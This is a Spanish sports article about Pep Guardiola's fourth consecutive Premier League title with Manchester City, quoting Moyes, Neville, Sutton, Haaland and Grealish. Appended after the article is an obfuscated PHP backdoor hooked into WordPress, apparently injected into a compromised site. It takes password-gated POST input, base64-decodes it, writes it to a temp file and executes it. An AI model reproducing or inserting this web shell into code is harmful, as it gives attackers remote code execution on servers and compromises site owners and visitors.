Guardiola, lo nunca visto

El catalán se convirtió en el primer entrenador en ganar la liga inglesa cuatro veces seguidas y la Premier League se rindió ante el técnico del City.

MANCHESTER, ENGLAND – MAY 19: MANCHESTER, ENGLAND – MAY 19: Khaldoon Al Mubarak, Chairman of Manchester City, and Pep Guardiola, Manager of Manchester City, speak following the team’s victory in the Premier League match between Manchester City and West Ham United at Etihad Stadium on May 19, 2024 in Manchester, England. (Photo by Michael Regan/Getty Images)

Atrás quedan las dudas y las críticas. Es el momento de los elogios. Pep Guardiola ganó el domingo su sexta Premier League al frente del Manchester City, un club al que el catalán ha llevado a lo más alto. De los 38 títulos en la carrera de Guardiola, 17 de ellos los ha logrado con los celestes en ocho años. El último, la Premier League conquistada el domingo frente al West Ham, fue la cuarta liga consecutiva de los cityzens, que se convirtieron en el primer equipo inglés en realizar tal hazaña. Nadie lo había hecho previamente.

Después de sumar su 12ª liga de su carrera en los banquillos, Guardiola vio como los comentaristas habituales de la Premier League, y algunos de sus propios jugadores, se rendían ante él. También David Moyes, el entrenador al que se midió el domingo. “El debate anteriormente era sobre la capacidad de un equipo para ganar dos ligas seguidas”, dijo el escocés en rueda de prensa. “Ha acabado con ese debate por todo lo alto, ganar cuatro ligas seguidas es increíble. Todo el mundo está asombrado con su trabajo. Sabe manejar o controlar a sus jugadores, ninguno se sale de la raya. No hay nadie mejor”.

El exjugador del Manchester United Gary Neville, reconvertido a comentarista de Sky Sports, no dejó pasar la oportunidad de elogiar a Guardiola pese a la rivalidad entre los dos clubes de Manchester. “Ha diseñado un estilo de juego que no solo copian en Inglaterra, sino en toda Europa”, dijo el inglés. “Es una máquina de ganar, más que nada, y eso es algo que inculca a cualquiera que trabaje con él”. Otro exfutbolista cuya presencia es habitual en los medios ingleses es la de Chris Sutton. Él también habló maravillas del equipo de Pep el domingo: “¿Es este el mejor equipo que hemos visto nunca en la Premier League? El Arsenal se quedó muy cerca. El año pasado ya lo intentaron, en este han mejorado, pero no ha sido suficiente”.

Durante las celebraciones en el césped del Etihad Stadium, a Guardiola se lo vio alegre, relajado. Cariñoso con jugadores y miembros del cuerpo técnico. Un cariño que también recibió el catalán por parte de algunos de sus jugadores. “A veces es un poco exigente”, explicó Haaland. “Es duro, pero mira lo que ha conseguido. Exige mucho cada día y si no estás a la altura tendrás problemas. Es exigente, pero es un tipo encantador y lo quiero mucho”. Eso sí, la frase que dijo después de ganar el título retumba en Mánchester: “La realidad es que estoy más cerca de irme que de quedarme. Ya hablé con el club y le dije que por ahora quiero quedarme. Estaré aquí la próxima temporada, luego hablaremos, pero llevo ocho o nueve años aquí… Veremos”.

“Es un tipo increíble”, contó Grealish momentos después de ganar la tercera Premier League de su carrera. “Esta temporada he tenido tramos en los que lo he pasado mal fuera del campo, no tengo problemas en aceptarlo, y él siempre ha estado ahí para míEs un entrenador brillante sobre el campo, pero también me ha ayudado de puertas adentro y en su despacho”.

Solo Sir Alex Ferguson ha ganado más ligas que Guardiola en Inglaterra. Trece del escocés al frente al Manchester United, por seis del catalán en el otro equipo de la ciudad. El domingo igualó los registros de George Ramsay al frente del Aston Villa entre 1884 y 1926 y de Bob Paisley con el Liverpool entre 1976 y 1983.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}